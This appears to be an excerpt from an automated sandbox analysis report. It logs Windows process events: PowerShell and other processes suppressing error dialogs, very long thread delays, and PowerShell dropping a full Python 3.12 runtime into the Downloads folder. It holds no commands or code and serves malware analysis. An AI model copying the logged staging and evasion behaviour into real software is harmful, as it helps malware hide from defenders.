                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8332
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1567
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2420
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7331
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Launcher\pyw.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Launcher\py.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\select.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pydJump to dropped file
                Source: C:\Windows\System32\svchost.exe TID: 2532Thread sleep time: -30000s >= -30000s
